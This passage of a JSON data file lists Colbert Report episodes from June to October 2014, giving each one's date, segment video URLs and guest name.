        "http://thecolbertreport.cc.com/videos/eozrlj/racial-perceptions-and-economic-stress",
        "http://thecolbertreport.cc.com/videos/n3etz1/ta-nehisi-coates",
        "http://thecolbertreport.cc.com/videos/200z2y/sign-off---hand-mirror"
      ],
      "guest": "Ta-Nehisi Coates"
    },
    {
      "date": "2014-06-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ddo89r/world-cup-victory-for-team-usa",
        "http://thecolbertreport.cc.com/videos/xoa360/the-word---a-darker-shade-of-pale",
        "http://thecolbertreport.cc.com/videos/qpaogb/majority-support-for-same-sex-marriage",
        "http://thecolbertreport.cc.com/videos/8buw4s/david-boies---theodore-b--olson",
        "http://thecolbertreport.cc.com/videos/4gkwgg/sign-off---foam-finger"
      ],
      "guest": "David Boies &amp; Theodore B. Olson"
    },
    {
      "date": "2014-06-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/exebzv/intro---6-18-14",
        "http://thecolbertreport.cc.com/videos/hgs925/arrest-of-benghazi-terror-mastermind",
        "http://thecolbertreport.cc.com/videos/a1yfmv/hillary-clinton-vs--the-rnc-squirrel",
        "http://thecolbertreport.cc.com/videos/qj2x93/thad-cochran-on-doing-indecent-things-with-animals",
        "http://thecolbertreport.cc.com/videos/3ul9zn/katty-kay---claire-shipman",
        "http://thecolbertreport.cc.com/videos/och071/sign-off---goodnight"
      ],
      "guest": "Katty Kay &amp; Claire Shipman"
    },
    {
      "date": "2014-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gt99v3/the-iraq-pack",
        "http://thecolbertreport.cc.com/videos/445utq/thought-for-food---domino-s-smart-slice---doritos-jacked",
        "http://thecolbertreport.cc.com/videos/cbr3yz/-yo--smartphone-app",
        "http://thecolbertreport.cc.com/videos/3abzv4/jay-carney",
        "http://thecolbertreport.cc.com/videos/h0b8ou/sign-off---goodnight"
      ],
      "guest": "Jay Carney"
    },
    {
      "date": "2014-06-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7bqhfd/team-usa-s-tragic-tie-with-portugal",
        "http://thecolbertreport.cc.com/videos/k8orr2/obama-s-response-to-isis-in-iraq---mark-mazzetti",
        "http://thecolbertreport.cc.com/videos/72elnv/jeremy-meeks-s-handsome-mug-shot",
        "http://thecolbertreport.cc.com/videos/07oysy/john-green",
        "http://thecolbertreport.cc.com/videos/mwnvtk/sign-off---goodnight"
      ],
      "guest": "John Green"
    },
    {
      "date": "2014-06-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tmjbzp/intro---6-24-14",
        "http://thecolbertreport.cc.com/videos/ee0zj7/isis-invades-hashtagistan",
        "http://thecolbertreport.cc.com/videos/bveu0w/tip-wag---fda---ben---jerry-s",
        "http://thecolbertreport.cc.com/videos/bu43e8/new-york-s-ban-on-tiger-selfies",
        "http://thecolbertreport.cc.com/videos/bo739z/edie-falco",
        "http://thecolbertreport.cc.com/videos/hgf6rh/sign-off---goodnight"
      ],
      "guest": "Edie Falco"
    },
    {
      "date": "2014-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rpnj8s/obama-s-chipotle-blunder",
        "http://thecolbertreport.cc.com/videos/glsyx9/stephen-colbert-s-bats--t-serious---child-immigrant-intrigue",
        "http://thecolbertreport.cc.com/videos/nx3ix1/stephen-colbert-s-bats--t-serious---child-immigrant-intrigue---john-burnett",
        "http://thecolbertreport.cc.com/videos/rki77c/primary-victory-for-thad-cochran",
        "http://thecolbertreport.cc.com/videos/rn2gd8/eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/q6den3/sign-off---goodnight"
      ],
      "guest": "Rep. Eleanor Holmes Norton"
    },
    {
      "date": "2014-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/suqg0f/stephen-colbert-s-bats--t-serious---the-vast-government-soccer-conspiracy",
        "http://thecolbertreport.cc.com/videos/autzis/tip-wag---north-carolina-state-legislature---cereal-manufacturers",
        "http://thecolbertreport.cc.com/videos/jrdas9/paul-rudd-pt--1",
        "http://thecolbertreport.cc.com/videos/rb9bo7/paul-rudd-pt--2",
        "http://thecolbertreport.cc.com/videos/8vp2bp/sign-off---so-long-for-two-weeks"
      ],
      "guest": "Paul Rudd"
    },
    {
      "date": "2014-07-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fy2b19/intro---7-14-14",
        "http://thecolbertreport.cc.com/videos/9cspva/world-cup-recap",
        "http://thecolbertreport.cc.com/videos/mlyvqh/thank-you--racism---boehner-v--obama",
        "http://thecolbertreport.cc.com/videos/xivy3m/hobby-lobby-case",
        "http://thecolbertreport.cc.com/videos/9nzwjt/vessyl-digital-cup",
        "http://thecolbertreport.cc.com/videos/6cvwe6/jad-abumrad---robert-krulwich",
        "http://thecolbertreport.cc.com/videos/rpfaco/sign-off---goodnight"
      ],
      "guest": "Jad Abumrad, Robert Krulwich"
    },
    {
      "date": "2014-07-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nnucn6/obama-s-senioritis",
        "http://thecolbertreport.cc.com/videos/f0uh68/threatdown---all-bear-edition",
        "http://thecolbertreport.cc.com/videos/08a2dg/vint-cerf-pt--1",
        "http://thecolbertreport.cc.com/videos/x9hnxr/vint-cerf-pt--2",
        "http://thecolbertreport.cc.com/videos/dixoxg/sign-off---goodnight"
      ],
      "guest": "Vint Cerf"
    },
    {
      "date": "2014-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/anklfa/intro---7-16-14",
        "http://thecolbertreport.cc.com/videos/53n0nf/conservative-contempt-for-bill-de-blasio",
        "http://thecolbertreport.cc.com/videos/cbs1n7/rick-perry-s-makeover---uncensored",
        "http://thecolbertreport.cc.com/videos/1flr4c/filling-captain-america-s-shoes---joe-quesada",
        "http://thecolbertreport.cc.com/videos/ypm476/bill-de-blasio",
        "http://thecolbertreport.cc.com/videos/slmbh6/sign-off----captain-america-"
      ],
      "guest": "Mayor Bill de Blasio"
    },
    {
      "date": "2014-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ket4ms/malaysia-airlines-crash---hamas-israel-violence",
        "http://thecolbertreport.cc.com/videos/z3gi0q/questionable-compassion-for-child-immigrants",
        "http://thecolbertreport.cc.com/videos/bfvmgh/coal-rolling",
        "http://thecolbertreport.cc.com/videos/70ezhu/steven-m--wise",
        "http://thecolbertreport.cc.com/videos/n00bpi/sign-off---soot-blast"
      ],
      "guest": "Steven Wise"
    },
    {
      "date": "2014-07-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qimhj6/intro---7-21-14",
        "http://thecolbertreport.cc.com/videos/n71mkf/world-news-wrap-up",
        "http://thecolbertreport.cc.com/videos/8e5dyu/colbert-nation-vs--amazon---edan-lepucki",
        "http://thecolbertreport.cc.com/videos/egw3ua/nancy-pelosi-pt--1",
        "http://thecolbertreport.cc.com/videos/q8mj7b/nancy-pelosi-pt--2",
        "http://thecolbertreport.cc.com/videos/98szje/sign-off----sweetness--9-"
      ],
      "guest": "Rep. Nancy Pelosi"
    },
    {
      "date": "2014-07-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a6s2qu/rep--steve-pearce-s-fact-finding-mission-in-central-america",
        "http://thecolbertreport.cc.com/videos/d24npe/rising-calls-for-obama-s-impeachment",
        "http://thecolbertreport.cc.com/videos/stx9ln/rising-calls-for-obama-s-impeachment---p-k--winsome",
        "http://thecolbertreport.cc.com/videos/qf023x/rory-mcilroy-and-caroline-wozniacki-s-post-breakup-triumph",
        "http://thecolbertreport.cc.com/videos/1872w0/julia-ioffe",
        "http://thecolbertreport.cc.com/videos/rxjlpc/sign-off---p-k--winsome"
      ],
      "guest": "Julia Ioffe"
    },
    {
      "date": "2014-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/74ly7x/housing-crisis-for-child-immigrants",
        "http://thecolbertreport.cc.com/videos/w0dhco/six-californias",
        "http://thecolbertreport.cc.com/videos/rmgh1u/six-californias---tim-draper",
        "http://thecolbertreport.cc.com/videos/qb2d4f/lowe-s-vs--veterans-affairs",
        "http://thecolbertreport.cc.com/videos/a368r9/mary-mazzio---oscar-vazquez",
        "http://thecolbertreport.cc.com/videos/8nsg9g/sign-off---goodnight"
      ],
      "guest": "Mary Mazzio, Oscar Vazquez"
    },
    {
      "date": "2014-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9bfzta/darth-vader-for-president",
        "http://thecolbertreport.cc.com/videos/br4k5m/tip-wag----true-blood----washington--d-c---court-of-appeals",
        "http://thecolbertreport.cc.com/videos/o26y1r/elon-musk-pt--1",
        "http://thecolbertreport.cc.com/videos/s4aaoq/elon-musk-pt--2",
        "http://thecolbertreport.cc.com/videos/baab8l/exclusive---elon-musk-discusses-mars",
        "http://thecolbertreport.cc.com/videos/9pmgk5/sign-off---goodnight"
      ],
      "guest": "Elon Musk"
    },
    {
      "date": "2014-07-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/99fqm5/magical-afternoon-at-comic-con",
        "http://thecolbertreport.cc.com/videos/yxerhp/the-word---see-no-equal",
        "http://thecolbertreport.cc.com/videos/c8gyzb/-kim-kardashian--hollywood--game",
        "http://thecolbertreport.cc.com/videos/me3jxh/beck"
      ],
      "guest": "Beck"
    },
    {
      "date": "2014-07-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/go3xsz/stephen-colbert-s-i-need-a-drink",
        "http://thecolbertreport.cc.com/videos/zo7j8y/the-sarah-palin-channel",
        "http://thecolbertreport.cc.com/videos/oeurov/jon-batiste-and-stay-human",
        "http://thecolbertreport.cc.com/videos/84mh53/sign-off---jon-batiste-and-stay-human"
      ],
      "guest": "Jon Batiste &amp; Stay Human"
    },
    {
      "date": "2014-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vy7myr/orlando-bloom-s-altercation-with-justin-bieber",
        "http://thecolbertreport.cc.com/videos/mfm78m/corporate-inversions",
        "http://thecolbertreport.cc.com/videos/gv7xvj/corporate-inversions---allan-sloan",
        "http://thecolbertreport.cc.com/videos/psbsuw/naked-tv",
        "http://thecolbertreport.cc.com/videos/lb70bp/james-franco",
        "http://thecolbertreport.cc.com/videos/n2673s/sign-off---goodnight"
      ],
      "guest": "James Franco"
    },
    {
      "date": "2014-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dwf82q/women-on-american-currency",
        "http://thecolbertreport.cc.com/videos/cruj3s/the-conflict-over-covering-the-conflict-in-gaza",
        "http://thecolbertreport.cc.com/videos/m4juon/tip-wag---beelzebub---nasa",
        "http://thecolbertreport.cc.com/videos/2mpwlv/campbell-brown",
        "http://thecolbertreport.cc.com/videos/26ag1q/sign-off---monitoring-system"
      ],
      "guest": "Campbell Brown"
    },
    {
      "date": "2014-08-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zcyj0l/40th-anniversary-of-nixon-s-resignation",
        "http://thecolbertreport.cc.com/videos/9hxmyy/a-nation-betrayed---a-fond-look-back---74",
        "http://thecolbertreport.cc.com/videos/c505xx/pat-buchanan",
        "http://thecolbertreport.cc.com/videos/ecplh0/john-w--dean",
        "http://thecolbertreport.cc.com/videos/jg7vda/sign-off---retrospectacular",
        "http://thecolbertreport.cc.com/videos/2kctj0/exclusive---pat-buchanan"
      ],
      "guest": "Pat Buchanan, John W. Dean"
    },
    {
      "date": "2014-08-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eu8j9u/open-carry-trailblazers",
        "http://thecolbertreport.cc.com/videos/imtefo/-hard-choices----hillary-clinton",
        "http://thecolbertreport.cc.com/videos/8tvtmw/language-lessons-from-america-s-senior-citizens",
        "http://thecolbertreport.cc.com/videos/wb06vr/james-cameron",
        "http://thecolbertreport.cc.com/videos/tovjr3/sign-off---goodnight"
      ],
      "guest": "James Cameron"
    },
    {
      "date": "2014-08-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v652g6/smile-file---kim-jong-un-at-the-lube-factory",
        "http://thecolbertreport.cc.com/videos/mrntln/rand-paul-s-hasty-exit",
        "http://thecolbertreport.cc.com/videos/82nvgq/news-anchor-baby",
        "http://thecolbertreport.cc.com/videos/gn8hz0/michael-fassbender"
      ],
      "guest": "Michael Fassbender"
    },
    {
      "date": "2014-08-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2mrfmc/intro---8-7-14",
        "http://thecolbertreport.cc.com/videos/bmd26v/vladimir-putin-s-food-sanctions",
        "http://thecolbertreport.cc.com/videos/nm2atj/ebola-panic",
        "http://thecolbertreport.cc.com/videos/7a9ir7/the-in-box---blt-vs--club",
        "http://thecolbertreport.cc.com/videos/ddvyto/brian-chesky",
        "http://thecolbertreport.cc.com/videos/dc3x0v/sign-off---bourbon-and-chicken"
      ],
      "guest": "Brian Chesky"
    },
    {
      "date": "2014-08-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xfa2tc/intro---8-26-14",
        "http://thecolbertreport.cc.com/videos/pupsy6/better-know-a-district---ohio-s-11th---marcia-fudge-pt--1",
        "http://thecolbertreport.cc.com/videos/llmmz6/better-know-a-district---ohio-s-11th---marcia-fudge-pt--2",
        "http://thecolbertreport.cc.com/videos/crpfrn/jeff-bridges---lois-lowry",
        "http://thecolbertreport.cc.com/videos/30umwt/sign-off---goodnight"
      ],
      "guest": "Jeff Bridges, Lois Lowry"
    },
    {
      "date": "2014-08-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/12kfzg/intro---8-27-14",
        "http://thecolbertreport.cc.com/videos/4komvc/outrage-in-ferguson",
        "http://thecolbertreport.cc.com/videos/h1itnw/outrage-in-ferguson---a-national-conversation-on-race",
        "http://thecolbertreport.cc.com/videos/8ye61k/scrabble-s-updated-dictionary",
        "http://thecolbertreport.cc.com/videos/v6x4qn/michael-sheen",
        "http://thecolbertreport.cc.com/videos/4g1qgo/sign-off---welcome-baby-eva-"
      ],
      "guest": "Michael Sheen"
    },
    {
      "date": "2014-08-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2x4lop/isis-panic",
        "http://thecolbertreport.cc.com/videos/yr7egy/isis-panic---announcing-reagan-s-return",
        "http://thecolbertreport.cc.com/videos/bac98y/vapshot-alcohol-vaporizer",
        "http://thecolbertreport.cc.com/videos/vmcz6o/jr",
        "http://thecolbertreport.cc.com/videos/q6o47f/sign-off---goodnight"
      ],
      "guest": "JR"
    },
    {
      "date": "2014-09-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7ohwx8/celebrity-nude-photo-scandal",
        "http://thecolbertreport.cc.com/videos/kc4ojp/police-militarization-in-america",
        "http://thecolbertreport.cc.com/videos/ukyqb3/police-militarization-in-america---norm-stamper",
        "http://thecolbertreport.cc.com/videos/xuzel5/good-news-for-sleep-deprived-teens",
        "http://thecolbertreport.cc.com/videos/sximkb/mandy-patinkin",
        "http://thecolbertreport.cc.com/videos/hpkdp0/sign-off---goodnight"
      ],
      "guest": "Mandy Patinkin"
    },
    {
      "date": "2014-09-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mrdb7o/intro---9-3-14",
        "http://thecolbertreport.cc.com/videos/v7c4zm/obama-s-isis-strategy",
        "http://thecolbertreport.cc.com/videos/2ccwew/obama-s-isis-strategy---frank-underwood",
        "http://thecolbertreport.cc.com/videos/r6svso/coach-class-conflicts",
        "http://thecolbertreport.cc.com/videos/ewijdy/randall-munroe",
        "http://thecolbertreport.cc.com/videos/cs2fnl/sign-off---goodnight"
      ],
      "guest": "Randall Munroe"
    },
    {
      "date": "2014-09-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/30z1ut/intro---9-4-14",
        "http://thecolbertreport.cc.com/videos/lo5wee/gays-in-the-st--patrick-s-day-parade",
        "http://thecolbertreport.cc.com/videos/zq72u5/the-midterm-round-up",
        "http://thecolbertreport.cc.com/videos/g7yyhh/al-qaeda-s-indian-franchise",
        "http://thecolbertreport.cc.com/videos/s4ds82/doris-kearns-goodwin",
        "http://thecolbertreport.cc.com/videos/fj6l1s/sign-off---ship-christening"
      ],
      "guest": "Doris Kearns Goodwin"
    },
    {
      "date": "2014-09-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g9wav3/intro---9-8-14",
        "http://thecolbertreport.cc.com/videos/dzxra6/william-and-kate-s-royal-pregnancy",
        "http://thecolbertreport.cc.com/videos/3160bg/waiting-forever-for-immigration-reform",
        "http://thecolbertreport.cc.com/videos/jz3rdd/pavlok-fitness-band",
        "http://thecolbertreport.cc.com/videos/23mu4v/john-lithgow",
        "http://thecolbertreport.cc.com/videos/a0x0bs/sign-off---goodnight"
      ],
      "guest": "John Lithgow"
    },
    {
      "date": "2014-09-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j5s4z1/apple-unveils-its-smartwatch",
        "http://thecolbertreport.cc.com/videos/s6gte9/the-midterm-round-up---the-gop-s-lady-problems",
        "http://thecolbertreport.cc.com/videos/hkfm7z/hometown-hero-town---detroit",
        "http://thecolbertreport.cc.com/videos/e4y7wx/jason-segel",
        "http://thecolbertreport.cc.com/videos/93zpki/sign-off---jason-segel-s-latest-award"
      ],
      "guest": "Jason Segel"
    },
    {
      "date": "2014-09-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u5vu07/intro---9-10-14",
        "http://thecolbertreport.cc.com/videos/p2b64y/obama-s-isis-speech",
        "http://thecolbertreport.cc.com/videos/lqm25y/dalai-lama-drama",
        "http://thecolbertreport.cc.com/videos/4pdz7v/tip-wag---nasa---trump-entertainment-resorts",
        "http://thecolbertreport.cc.com/videos/wn86jw/the-buypartisan-app",
        "http://thecolbertreport.cc.com/videos/hyx04c/henry-kissinger",
        "http://thecolbertreport.cc.com/videos/bipiaj/sign-off---goodnight"
      ],
      "guest": "Henry Kissinger"
    },
    {
      "date": "2014-09-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oeusg2/this-country-is-at-war-",
        "http://thecolbertreport.cc.com/videos/li99ni/republicans--predictions-of-the-iraq-crisis",
        "http://thecolbertreport.cc.com/videos/wna0mw/global-warming-threatens-bird-species",
        "http://thecolbertreport.cc.com/videos/ndpng7/lonn-taylor",
        "http://thecolbertreport.cc.com/videos/cl9arb/sign-off---jim-cornelison-sings-the-national-anthem"
      ],
      "guest": "Lonn Taylor"
    },
    {
      "date": "2014-09-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/848h60/the-next-miss-america",
        "http://thecolbertreport.cc.com/videos/lmtq66/the-vote-for-scottish-independence",
        "http://thecolbertreport.cc.com/videos/exs7p5/the-vote-for-scottish-independence---matt-wells",
        "http://thecolbertreport.cc.com/videos/0txz3z/think-tank-corruption",
        "http://thecolbertreport.cc.com/videos/m1a8gr/mindy-kaling",
        "http://thecolbertreport.cc.com/videos/0j1qdb/sign-off"
      ],
      "guest": "Mindy Kaling"
    },
    {
      "date": "2014-09-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/60e467/intro---9-16-14",
        "http://thecolbertreport.cc.com/videos/0agoip/the-kinda-sorta-war-and-the-u-s--s-mysterious-allies",
        "http://thecolbertreport.cc.com/videos/mzktzw/wall-street-meddles-with-restaurant-chain",
        "http://thecolbertreport.cc.com/videos/oyl7ka/unlocking-the-truth"
      ],
      "guest": "Unlocking the Truth"
    },
    {
      "date": "2014-09-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6d36zv/caped-cash-cows",
        "http://thecolbertreport.cc.com/videos/zryrry/undercover-at-comic-con---prince-hawkcat",
        "http://thecolbertreport.cc.com/videos/d791f1/undercover-at-comic-con---stephen-s-movie-pitches",
        "http://thecolbertreport.cc.com/videos/xq6f9b/military-vehicles-for-public-schools",
        "http://thecolbertreport.cc.com/videos/arckqm/viggo-mortensen",
        "http://thecolbertreport.cc.com/videos/bfflr6/sign-off---aragorn"
      ],
      "guest": "Viggo Mortensen"
    },
    {
      "date": "2014-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hn1ueg/checky",
        "http://thecolbertreport.cc.com/videos/yupbhd/no-boots-on-the-ground-in-iraq",
        "http://thecolbertreport.cc.com/videos/wjga35/sean-hannity-s-defense-of-adrian-peterson",
        "http://thecolbertreport.cc.com/videos/rd6gao/terry-gilliam",
        "http://thecolbertreport.cc.com/videos/148dzu/sign-off---stuffed-elephant"
      ],
      "guest": "Terry Gilliam"
    },
    {
      "date": "2014-09-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uc4f7i/awol-afghan-soldiers",
        "http://thecolbertreport.cc.com/videos/01cyc2/tip-wag---climate-change-marchers---senators-on-reality-tv",
        "http://thecolbertreport.cc.com/videos/x58aop/charles-krauthammer-on-obama-s-mental-state",
        "http://thecolbertreport.cc.com/videos/jq352p/tweedy"
      ],
      "guest": "Tweedy"
    },
    {
      "date": "2014-09-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j6xqew/u-s--airstrikes-in-syria",
        "http://thecolbertreport.cc.com/videos/ybvlae/better-know-a-district---california-s-2nd---jared-huffman",
        "http://thecolbertreport.cc.com/videos/b5ni29/the-russians-buy-pbr",
        "http://thecolbertreport.cc.com/videos/k5a58t/naomi-klein",
        "http://thecolbertreport.cc.com/videos/ksh5pr/sign-off---pbr"
      ],
      "guest": "Naomi Klein"
    },
    {
      "date": "2014-09-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5mneco/atone-phone---jeff-tweedy-calls",
        "http://thecolbertreport.cc.com/videos/tw7sr5/obama-s-coffee-cup-salute"
      ],
      "guest": "Bill Cosby"
    },
    {
      "date": "2014-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/p49ls4/the-suspicious-death-of-staten-island-chuck",
        "http://thecolbertreport.cc.com/videos/0hjuki/intro---9-25-14",
        "http://thecolbertreport.cc.com/videos/tjmnw0/eric-holder-s-resignation",
        "http://thecolbertreport.cc.com/videos/7dpl33/bill-o-reilly-s-elite-strike-force",
        "http://thecolbertreport.cc.com/videos/0w775u/smile-file---the-u-a-e--s-first-female-fighter-pilot-vs---the-five----uncensored",
        "http://thecolbertreport.cc.com/videos/g36k7p/walter-mischel",
        "http://thecolbertreport.cc.com/videos/fhpqlq/sign-off---marshmallows"
      ],
      "guest": "Walter Mischel"
    },
    {
      "date": "2014-09-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6ythcp/obama-s-rip-off-of-bush",
        "http://thecolbertreport.cc.com/videos/eecxwy/hillary-clinton-and-the-grandmother-of-all-scandals",
        "http://thecolbertreport.cc.com/videos/6w3vad/kim-jong-un-s-massive-cheese-consumption",
        "http://thecolbertreport.cc.com/videos/ojmtk8/jamie-oliver",
        "http://thecolbertreport.cc.com/videos/z231mw/sign-off---cake-and-cheese"
      ],
      "guest": "Jamie Oliver"
    },
    {
      "date": "2014-09-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6k6hq3/muslims-in-the-end-zone",
        "http://thecolbertreport.cc.com/videos/h1yge9/highlights-of-the-values-voter-summit",
        "http://thecolbertreport.cc.com/videos/8x6lww/the-benefits-of-pessimism---hans-beinholtz",
        "http://thecolbertreport.cc.com/videos/qofokt/jeffrey-tambor",
        "http://thecolbertreport.cc.com/videos/pnsz05/sign-off---goodnight"
      ],
      "guest": "Jeffrey Tambor"
    },
    {
      "date": "2014-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v6tds1/protests-in-hong-kong",
        "http://thecolbertreport.cc.com/videos/v51zzo/protests-in-hong-kong---louisa-lim",
        "http://thecolbertreport.cc.com/videos/zzbhqi/bill-o-reilly-takes-offense",
        "http://thecolbertreport.cc.com/videos/oviilh/mike-mullen",
        "http://thecolbertreport.cc.com/videos/5tiz1y/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/8f6kuv/exclusive---mike-mullen-extended-interview"
      ],
      "guest": "Adm. Mike Mullen"
    },
    {
      "date": "2014-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jyghug/intro---10-2-14",
        "http://thecolbertreport.cc.com/videos/x6d5sz/deathpocalypse-now---ebola-in-america---50-states-of-grave",
        "http://thecolbertreport.cc.com/videos/hhhqqd/deathpocalypse-now---ebola-in-america---kent-sepkowitz",
        "http://thecolbertreport.cc.com/videos/e72awe/solitocity",
        "http://thecolbertreport.cc.com/videos/ye2fnr/lynn-sherr",
        "http://thecolbertreport.cc.com/videos/7nl6i5/sign-off---hand-sanitizer"
      ],
      "guest": "Lynn Sherr"
    },
    {
      "date": "2014-10-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g5stw6/intro---10-6-14",
        "http://thecolbertreport.cc.com/videos/heaxbs/victory-for-gay-marriage---the-rise-of-amicus-briefs",
        "http://thecolbertreport.cc.com/videos/ssmvma/victory-for-gay-marriage---the-rise-of-amicus-briefs---allison-orr-larsen",
        "http://thecolbertreport.cc.com/videos/ayvbym/a-rare-correction---no-ebola-outbreak-in-the-u-s-",
        "http://thecolbertreport.cc.com/videos/fcax26/james-m--mcpherson",
        "http://thecolbertreport.cc.com/videos/bfwqfb/sign-off---goodnight"
      ],
      "guest": "James McPherson"
    },
    {
      "date": "2014-10-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hhqgbw/ebolapalooza",
        "http://thecolbertreport.cc.com/videos/nx3ewk/better-know-a-district---illinois-s-8th---tammy-duckworth",
        "http://thecolbertreport.cc.com/videos/q2857u/cheating-death---pandemic-health",
        "http://thecolbertreport.cc.com/videos/7swpxt/leon-wieseltier",
        "http://thecolbertreport.cc.com/videos/rete59/sign-off---cigarette"
      ],
      "guest": "Leon Wieseltier"
    },
    {
      "date": "2014-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e50viy/intro---10-8-14",
        "http://thecolbertreport.cc.com/videos/khi8w0/john-boehner-vs--america-s-anti-gay-marriage-crusaders",
        "http://thecolbertreport.cc.com/videos/m899eo/naming-the-war-against-isis",
        "http://thecolbertreport.cc.com/videos/hzou6l/carol-burnett",
        "http://thecolbertreport.cc.com/videos/hcc5br/sign-off---ear-tug"
      ],
      "guest": "Carol Burnett"
    },
    {
      "date": "2014-10-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/blfnlw/exclusive---robert-plant----little-maggie-",
        "http://thecolbertreport.cc.com/videos/jdri4u/robert-plant----rainbow-",
        "http://thecolbertreport.cc.com/videos/tyc0sx/intro---10-9-14",
        "http://thecolbertreport.cc.com/videos/0gscic/columbus-day-under-attack",
        "http://thecolbertreport.cc.com/videos/hpfwm4/raining-vs--sprinkling",
        "http://thecolbertreport.cc.com/videos/xfjyum/republicans-are-people--too",
        "http://thecolbertreport.cc.com/videos/jfanx7/robert-plant",
        "http://thecolbertreport.cc.com/videos/o2y6sr/sign-off----lullaby-and----the-ceaseless-roar-"
      ],
      "guest": "Robert Plant"
    },
    {
      "date": "2014-10-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fhnqjo/midterms--014---detour-to-gridlock---an-exciting-thing-that-i-am-totally-interested-in",
        "http://thecolbertreport.cc.com/videos/8zip3j/intro---10-13-14",
        "http://thecolbertreport.cc.com/videos/sx2hh2/32-episodes-left-for-the-report",
        "http://thecolbertreport.cc.com/videos/fp4xfy/walter-isaacson",
        "http://thecolbertreport.cc.com/videos/f4t3xr/sign-off---quality-time-with-americone-dream",
        "http://thecolbertreport.cc.com/videos/bxbwj4/midterms--014---detour-to-gridlock---dennis-daugaard"
      ],
      "guest": "Walter Isaacson"
    },
    {
      "date": "2014-10-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zg3zai/neil-young----who-s-gonna-stand-up---and-save-the-earth--",
        "http://thecolbertreport.cc.com/videos/wcjcgn/a-week-of-victories-for-gay-rights",
        "http://thecolbertreport.cc.com/videos/akzlpt/say-yes-to-rick-scott",
        "http://thecolbertreport.cc.com/videos/namhpu/neil-young",
        "http://thecolbertreport.cc.com/videos/veswmj/sign-off----special-deluxe-"
      ],
      "guest": "Neil Young"
    },
    {
      "date": "2014-10-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qw8rwv/who-s-attacking-me-now----larry-page",
        "http://thecolbertreport.cc.com/videos/q2u206/tip-wag---barack-obama---stan-lee",
        "http://thecolbertreport.cc.com/videos/xv3cdl/sean-hannity-s-question-of-the-day",
        "http://thecolbertreport.cc.com/videos/18x57e/justin-simien",
        "http://thecolbertreport.cc.com/videos/4tsbtt/sign-off---goodnight"
      ],
      "guest": "Justin Simien"
    },
    {
      "date": "2014-10-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uebndp/abandoned-wmds-in-iraq",
        "http://thecolbertreport.cc.com/videos/aywapn/abandoned-wmds-in-iraq---c-j--chivers",
        "http://thecolbertreport.cc.com/videos/3o1uzs/rick-scott-and-charlie-crist-s-bizarre-debate",
        "http://thecolbertreport.cc.com/videos/z4umi5/william-deresiewicz",
        "http://thecolbertreport.cc.com/videos/xrvm7x/stephen-s-old-ipod"
      ],
      "guest": "Bill Deresiewicz"
    },
    {
      "date": "2014-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e27u8w/intro---10-27-14",
        "http://thecolbertreport.cc.com/videos/8hjpi2/ebola-in-new-york",
        "http://thecolbertreport.cc.com/videos/whfeyg/louie-gohmert-on-gays-in-the-military",
        "http://thecolbertreport.cc.com/videos/jjpinj/meredith-vieira",
        "http://thecolbertreport.cc.com/videos/a0zbrf/sign-off---sundae"
      ],
      "guest": "Meredith Vieira"
    },
    {
      "date": "2014-10-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xxvx4u/war-on-halloween---flaming-bags-of-government",
        "http://thecolbertreport.cc.com/videos/jxddq4/the-nra-vs--pennsylvania-s-pet-eating-ban",
        "http://thecolbertreport.cc.com/videos/6cj1fk/tom-corbett-s-photoshopped-diversity",
        "http://thecolbertreport.cc.com/videos/nzy3nz/sport-report---fall-experimental-football-league",
